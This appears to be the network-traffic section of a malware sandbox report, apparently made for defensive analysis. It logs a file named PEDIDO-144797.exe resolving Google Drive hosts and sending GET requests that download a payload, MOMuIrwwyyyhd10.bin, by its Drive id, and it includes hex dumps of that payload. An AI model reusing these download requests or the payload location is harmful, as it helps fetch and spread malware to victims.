                                                                                                                                        Oct 4, 2024 10:50:46.338778019 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.339021921 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.339920998 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.340121031 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.340207100 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.340481997 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.341866016 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.342096090 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.342145920 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.342364073 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.343441010 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.343663931 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.343724966 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.343944073 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.345561028 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.345813990 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.345880985 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.346131086 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.346996069 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.347245932 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.347304106 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.347551107 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.348587990 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.348831892 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.348896980 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.349143982 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.350219011 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.350456953 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.350521088 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.350764036 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.351840019 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.352042913 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.352097034 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.352324009 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.353624105 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.353944063 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.354007959 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.354300976 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.355186939 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.355453968 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.355520964 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.355796099 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.356726885 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.356931925 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.356997967 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.357260942 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.358290911 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.358486891 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.358546019 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.358793974 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.359877110 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.360089064 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.360150099 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.360424995 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.361377001 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.361644983 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.361690998 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.361979008 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.362835884 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.363048077 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.363506079 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.363672018 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.363727093 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.364008904 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.365026951 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.365236044 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.365297079 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.365492105 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.366709948 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.366954088 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.367018938 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.367212057 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.368161917 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.368371010 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.368436098 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.368657112 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.369622946 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.369821072 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.369870901 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.370158911 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.370888948 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.371591091 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.371634007 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.371906996 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.372478962 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.372642040 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.372689009 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.372988939 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.373887062 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.374138117 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.374202013 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.374474049 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.375134945 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.375334978 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.375381947 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.375405073 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.375423908 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.375459909 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.375516891 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.375596046 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.375597000 CEST49733443192.168.11.20142.250.80.97
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 4, 2024 10:50:42.505361080 CEST | 58810 | 53 | 192.168.11.20 | 1.1.1.1
Oct 4, 2024 10:50:42.612458944 CEST | 53 | 58810 | 1.1.1.1 | 192.168.11.20
Oct 4, 2024 10:50:43.248855114 CEST | 57400 | 53 | 192.168.11.20 | 1.1.1.1
Oct 4, 2024 10:50:43.348310947 CEST | 53 | 57400 | 1.1.1.1 | 192.168.11.20

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 4, 2024 10:50:42.505361080 CEST | 192.168.11.20 | 1.1.1.1 | 0x4a24 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Oct 4, 2024 10:50:43.248855114 CEST | 192.168.11.20 | 1.1.1.1 | 0x86da | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 4, 2024 10:50:42.612458944 CEST | 1.1.1.1 | 192.168.11.20 | 0x4a24 | No error (0) | drive.google.com | (none) | 142.251.40.206 | A (IP address) | IN (0x0001) | false
Oct 4, 2024 10:50:43.348310947 CEST | 1.1.1.1 | 192.168.11.20 | 0x86da | No error (0) | drive.usercontent.google.com | (none) | 142.250.80.97 | A (IP address) | IN (0x0001) | false

• drive.google.com
• drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49732 | 142.251.40.206 | 443 | 6780 | C:\Users\user\Desktop\PEDIDO-144797.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-04 08:50:42 UTC | 216 | OUT | GET /uc?export=download&id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: drive.google.com
Cache-Control: no-cache
2024-10-04 08:50:43 UTC | 1610 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 04 Oct 2024 08:50:43 GMT
Location: https://drive.usercontent.google.com/download?id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: script-src 'nonce-s69FSt0WE0ru-fW_bG_cSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                        1 | 192.168.11.20 | 49733 | 142.250.80.97 | 443 | 6780 | C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                        2024-10-04 08:50:43 UTC | 258 | OUT | GET /download?id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi&export=download HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2024-10-04 08:50:45 UTC | 4899 | IN | HTTP/1.1 200 OK
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Content-Disposition: attachment; filename="MOMuIrwwyyyhd10.bin"
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Content-Length: 288320
                                                                                                                                        Last-Modified: Thu, 03 Oct 2024 14:06:21 GMT
                                                                                                                                        X-GUploader-UploadID: AD-8ljtCDY1N2MFyrjuaWtEeIbQdzjV2qFVqA43xVMA-BcTRCmFLL2gwc1AZMZsQo8z9Zsa_7SsBM9C6Cg
                                                                                                                                        Date: Fri, 04 Oct 2024 08:50:45 GMT
                                                                                                                                        Expires: Fri, 04 Oct 2024 08:50:45 GMT
                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                        X-Goog-Hash: crc32c=6306Dw==
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close
                                                                                                                                        2024-10-04 08:50:45 UTC | 4899 | IN | Data Raw: 46 89 d6 84 4c f9 60 90 41 74 e2 11 a2 db 34 2d c1 89 1c 40 f0 e1 0d 4f 87 71 c7 a4 45 d3 a4 95 0b 53 03 0a 2b 18 a3 fd 49 5d 99 54 3e f8 5c a5 2b 9f 97 b0 c2 be e7 7b 3c 1c 4a 1f 17 da a6 1f a8 e0 7e d7 25 cc ab 01 50 2b a4 fd a7 d0 d1 ef 95 74 b9 b0 f2 d9 08 70 79 ba 1c b9 2b 87 c7 d9 d3 e2 a6 0f cb 30 8b 3d 12 bd d7 47 a9 d9 8f a7 47 17 dc 45 aa ce 1e e9 66 95 29 1f a5 d9 6e 70 86 ad 14 e7 8c f3 5a 5d 9d 60 ad d7 76 53 47 0a 62 3a 34 8d 3c 7f 4d 98 d5 29 f2 22 ae 89 55 ca c2 6f 92 48 04 7a e3 36 d6 39 b8 15 6f f6 fc f2 53 8a 3c 6a 58 f2 43 b0 3e f5 31 f9 63 64 ef 61 36 ce f0 2f 7e 69 95 2e b5 90 c0 7f ba dd ad 0e 27 ad b9 ca 91 6c b6 65 19 96 ea 95 19 94 ed 4f b1 ad 15 47 59 60 17 6d b5 20 47 57 de 10 f8 ef 8f 1e da 08 6b ee 5b ec bb 33 65 17 39 04 9e
                                                                                                                                        Data Ascii: FL`At4-@OqES+I]T>\+{<J~%P+tpy+0=GGEf)npZ]`vSGb:4<M)"UoHz69oS<jXC>1cda6/~i.'leOGY`m GWk[3e9
                                                                                                                                        2024-10-04 08:50:45 UTC | 4896 | IN | Data Raw: cd 9f 2a ce 3d f3 25 ad ee 06 1b 6c da d5 06 9d 72 23 af 32 64 9a 70 32 dd 45 32 c6 92 b2 16 54 67 24 68 ad 2a 2a ac 15 7d 60 83 fa 2d 24 d6 ce 96 ea 6f bd 01 e6 13 94 13 ae 60 6e e5 1b be b3 d2 c5 d6 85 1b 02 e4 96 3f dd 3a 9d 26 6b 0d 99 5d 98 bf e6 59 2c a8 b5 76 57 fa 16 59 a4 80 a1 d2 4a 6f 67 29 98 e8 37 a2 22 df d6 d6 66 c3 fb 2d 45 95 f9 fc 32 7a 15 48 b8 f3 de 77 96 b0 47 7d ff 9c cb f8 f9 17 64 be 58 d4 d3 85 4a 35 6a 06 02 fa 57 2e 9f 59 af c5 6c 98 b4 29 b5 24 a5 58 35 0c 60 a9 b2 bf 86 51 4a cf cf 2d a5 99 90 25 8c fc 5e a6 b1 5b b2 f3 c2 e1 3e d5 d4 df eb c1 b0 0b 3a 70 85 03 c0 0e b9 57 82 e8 b7 1c 67 8c f6 ca f0 88 dd 61 52 08 5c 41 98 44 3e e3 2d d8 51 3a e2 c5 8f 71 5c c8 9d 23 6b b5 8f 43 72 33 86 36 c7 65 fb 4e 4e 46 33 49 fd d4 8c 90
                                                                                                                                        Data Ascii: *=%lr#2dp2E2Tg$h**}`-$o`n?:&k]Y,vWYJog)7"f-E2zHwG}dXJ5jW.Yl)$X5`QJ-%^[>:pWgaR\AD>-Q:q\#kCr36eNNF3I
                                                                                                                                        2024-10-04 08:50:45 UTC | 1255 | IN | Data Raw: e6 89 69 4f b9 d9 89 b6 73 42 15 26 dd f8 73 c3 4a 90 44 df 5e 47 20 a3 51 03 e8 85 89 16 44 8f a4 d7 d2 ed 1e ea 26 50 64 89 11 12 0f fd ee 7d b1 f8 e1 73 1d b9 70 56 fc 61 22 9b a7 e0 04 ea 5a 09 3c 7e 64 37 0b 1d 93 8d c5 ec ae 81 27 ae a2 54 bf 05 e8 e8 d5 a2 c1 47 b9 84 fe 12 3b ba 5a f8 71 92 16 f6 d7 07 d4 71 82 b1 42 14 e0 30 7d eb dd 7a e9 fc 43 62 ab f9 53 bc f6 c9 40 ec e2 db 3a 79 c9 49 d0 99 7f 74 a3 9b 4e ae aa cf 54 44 88 52 a5 ac 50 a1 94 eb ca 5f 15 36 43 b6 51 8a b1 a0 95 b2 84 b4 39 7b 07 4a 08 be 40 ff ad 20 fc 65 5d 07 f2 b0 22 0e c2 b2 79 df ac 66 11 cc ff b3 57 36 b4 cf 3b 40 b4 cd 78 56 11 f6 9b 57 10 3d d5 bc 71 27 b4 55 3d aa 32 69 13 8d 4e d5 41 8a 06 e5 1e ba 32 f4 7e 3e 60 0d e1 b3 ef a1 dc 44 16 90 82 83 9b 32 89 3b 0f b1 d0
                                                                                                                                        Data Ascii: iOsB&sJD^G QD&Pd}spVa"Z<~d7'TG;ZqqB0}zCbS@:yItNTDRP_6CQ9{J@ e]"yfW6;@xVW=q'U=2iNA2~>`D2;
                                                                                                                                        2024-10-04 08:50:45 UTC | 72 | IN | Data Raw: 72 3f 75 eb b9 ba b4 ac 83 13 85 34 f5 be b1 e3 92 c9 66 e7 8d 38 0d 6c 5b 94 61 6c 04 55 fa 58 69 4e de 63 be b6 25 3c ff 0a a8 7f ae f4 dc f9 be fa f5 89 68 02 e6 cf 27 fa d1 92 34 0d ee a4 99 34 53 6e 82 5a 29 21
                                                                                                                                        Data Ascii: r?u4f8l[alUXiNc%<h'44SnZ)!
                                                                                                                                        2024-10-04 08:50:45 UTC | 1255 | IN | Data Raw: 18 47 34 21 92 61 63 2b 99 b0 65 48 f0 f6 06 32 9d 34 2d f6 0e b5 9c d9 7f a4 48 e9 aa 74 af 4e 22 bf 68 cd 8b 1b 2b 04 0e 3f 94 3f 29 19 5b 7c b7 24 0c 8b 9e 2f 0f fd db 6d b1 f8 e1 4e 88 cc 8d 6f b2 35 94 9e 39 13 d6 2f d7 48 3d 25 6b 0b 25 73 48 ba 98 b1 6d 57 68 4a a4 78 a4 d3 4b bf e6 79 77 4e fe 69 d2 51 4a 76 26 f8 71 ab f3 9d be e5 4c 87 6c 70 28 55 d3 a5 da 63 a4 8e f4 58 54 62 24 c4 30 f6 fd 80 c2 aa 22 23 39 2b 19 3c a6 a6 e7 28 11 a4 c9 6d 4f 92 eb 14 43 ad 53 5a 24 dc b7 57 91 5f 15 03 64 2c f1 a5 46 4e 1c 3d 7d 06 8a a2 9d 89 b1 93 35 12 94 f0 a5 10 ec a5 8f a8 2d 0b 95 6c 79 df 15 e7 5e 16 b7 7c a7 bd f1 3b c3 cf 61 9d 78 d5 95 0a 1d 5e 26 4d d1 53 8e 32 3d 13 04 eb d9 6f 15 6e 72 d6 b9 ec 87 e8 cf 41 04 02 91 ff 1b 37 3a 0c 2e 4e cc c2 9e
                                                                                                                                        Data Ascii: G4!ac+eH24-HtN"h+??)[|$/mNo59/H=%k%sHmWhJxKywNiQJv&qLlp(UcXTb$0"#9+<(mOCSZ$W_d,FN=}5-ly^|;ax^&MS2=onrA7:.N
                                                                                                                                        2024-10-04 08:50:45 UTC | 1255 | IN | Data Raw: a6 fa 14 e6 ec 00 5e bf de d8 b6 ca 60 c6 55 7b f6 91 0e 36 27 2b 01 7c 89 6f 5c ff d2 e5 19 de 8a da df 03 03 34 51 f8 fa f1 16 29 8e 3c 61 4b 0f 87 0b 0a ff c4 89 4b 77 53 27 2f 8f 2f 1e f3 d1 ae 65 09 a9 da 69 4d ed aa 57 0a e5 af f7 5b e2 04 c2 1c 21 21 92 20 23 95 ac e9 6a 07 0c 8c 3b 47 69 07 f5 3e f9 69 4b bd 2c 51 03 53 8d 76 30 77 43 e5 94 bf 37 fd a0 51 bc 95 d9 c7 a0 6f 6d f6 2a 9a 2c 46 34 a9 5e bc 56 f6 09 19 62 41 fe 4e 9b 97 09 29 6b 08 13 fe 44 b7 0d 3d d0 2a 8f b1 ab 40 e5 b5 15 e4 65 5d e9 b6 2e 0e a3 59 08 3d cf 78 f2 b8 89 b3 b0 12 cf 65 a4 d1 70 ab 4b 77 43 83 2a 70 82 f6 6a 6a d6 b4 23 7a 54 5c fc a6 7b 28 81 27 b8 61 7e c4 46 27 af f4 72 27 02 bf 14 18 39 89 3e 31 92 e6 d6 14 a3 da 3e 2a 9b 54 db 51 fb e4 7c 9f 9f 99 c3 c0 79 f0 4d
                                                                                                                                        Data Ascii: ^`U{6'+|o\4Q)<aKKwS'//eiMW[!! #j;Gi>iK,QSv0wC7Qom*,F4^VbAN)kD=*@e].Y=xepKwC*pjj#zT\{('a~F'r'9>1>*TQ|yM
                                                                                                                                        2024-10-04 08:50:45 UTC | 1255 | IN | Data Raw: c2 fe e3 07 14 63 1c 3b ec 4a 2a e5 4a 46 9e 60 a6 41 f0 bc 12 9b 46 b5 63 b2 2d d0 01 59 43 ae 35 11 52 ed a2 d8 0c 8b 09 5e 2f c1 db 0d 10 89 e1 6d 1b af b5 f3 eb cf 23 03 bf 10 45 f8 88 4d fd 45 ae bc 83 9b 7f 4d 86 61 dd 8c ab 23 ed d5 33 93 88 8b 06 a8 c4 c7 18 0f 8d 23 72 84 50 ed f9 de 67 93 85 33 a0 f7 f1 3e 4b e6 92 5d 8f 87 4b b0 16 3c 36 58 68 e6 b0 46 77 2e 4d 4e d8 1f 02 77 27 78 f4 29 69 f4 a6 44 b6 b3 06 5b fb a6 08 c7 14 ff b3 38 36 1f 38 4d d3 ac fd f0 4b 57 7c 1d 53 95 62 a6 8f 2d b1 dc 35 db ec 28 85 4a c2 a5 b0 dd 84 bf 48 bd c6 0c 6b cf 7b 75 48 f9 a0 cc b5 04 8d bc 5e 83 44 5e a0 72 c7 3f 97 f3 61 b4 a0 38 8f 58 57 e3 47 d3 ce 15 55 7f f4 f0 6a 8f e5 b9 8e a9 ec 1c a5 da 59 53 6b 75 ba 40 34 10 bd 4e aa bc 83 8c 15 fc 65 15 4c 4f 12
                                                                                                                                        Data Ascii: c;J*JF`AFc-YC5R^/m#EMEMa#3#rPg3>K]K<6XhFw.MNw'x)iD[868MKW|Sb-5(JHk{uH^D^r?a8XWGUjYSku@4NeLO
                                                                                                                                        2024-10-04 08:50:45 UTC | 1255 | IN | Data Raw: 04 27 b7 bd f3 38 a9 7d e2 4e 47 82 4b 12 81 70 e6 c9 73 f8 ed e9 c0 f9 5b dd 2c db e4 84 99 74 37 af cd 76 ed 6d d7 2d 76 33 4b 05 8c 52 9c 78 30 fd e8 ce 3d 84 b6 ce e9 43 74 cc 66 61 91 80 01 c1 a2 20 05 02 f6 77 df f1 73 f0 0a dd 05 34 1b c5 5b 9f f3 a1 83 78 91 07 5e e8 5a fb 9b 91 e0 be 30 ff 37 ba ab 19 7d 0d 7c 1c 93 85 f9 a4 2a f8 3a 16 4a c7 4e 23 bd 7f ac 4d d0 91 da 37 f7 0e 21 db 71 47 d4 52 7a 59 99 a9 68 62 e0 22 fa 85 ea ff 97 a0 0a fe 70 b7 b7 92 59 3c 68 82 b4 16 73 16 52 9e 52 78 d2 df df d9 0c 10 b4 1a 5d 67 f1 09 c6 3a 26 d5 98 7f cf 25 61 f4 ee 9c db ff 63 eb 45 b0 38 9e 1e d3 b0 b3 f6 d4 ad c4 8f 57 37 cf 42 a7 d8 38 45 23 c3 06 b8 16 3e 4d ca 76 a8 7c 99 70 5e c9 35 94 10 00 78 6d fc f4 87 57 73 af af 24 8f 4d d6 a0 7b 72 de b5 61
                                                                                                                                        Data Ascii: '8}NGKps[,t7vm-v3KRx0=Ctfa ws4[x^Z07}|*:JN#M7!qGRzYhb"pY<hsRRx]g:&%acE8W7B8E#>Mv|p^5xmWs$M{ra
                                                                                                                                        2024-10-04 08:50:45 UTC | 1255 | IN | Data Raw: c4 73 39 f4 18 df 63 19 ab 88 b2 df 80 72 5e 06 14 b9 ec 6b e9 93 45 8b ae 0f 77 7c 86 d5 31 1a 55 e0 ed ba 13 fc f4 c9 99 d6 12 1d ef 34 b2 c4 3d fa 80 c7 ab 2c 6f 15 1a 68 b6 ea ce 77 40 01 84 c6 c2 ae 6d 20 bd b7 fc 3b a0 ab 36 f3 c5 43 04 bb b1 6f 1e 53 76 ff 58 97 6c b6 64 6f 84 49 4e 50 b6 a4 1c f4 29 25 a0 38 fb e2 ad 96 9a 90 54 50 37 4c a7 44 6b 0c 7f 99 8a 5c c7 59 1b 21 ba cb f6 4f bf 8d 4c 8a f3 4a 88 c6 0b 0b eb 16 36 98 83 72 28 8f 6d 33 7e d2 ea 92 0a 51 13 da fd fe cc 29 60 89 05 fe 25 81 61 0c 49 ea 82 b0 6d ca 96 d8 49 2a f1 fa 3a 19 73 c1 33 85 4a af b4 0f a5 01 89 cf 20 c6 ec 08 85 4f 82 5b 44 b6 08 48 5c e1 62 cc 85 99 44 9a 84 79 83 83 36 79 39 4d 51 f9 09 d2 50 aa dd 63 96 3a 09 d3 7b 29 9f 8b 3c 96 eb af 48 c4 30 c0 89 6a c1 dd 74
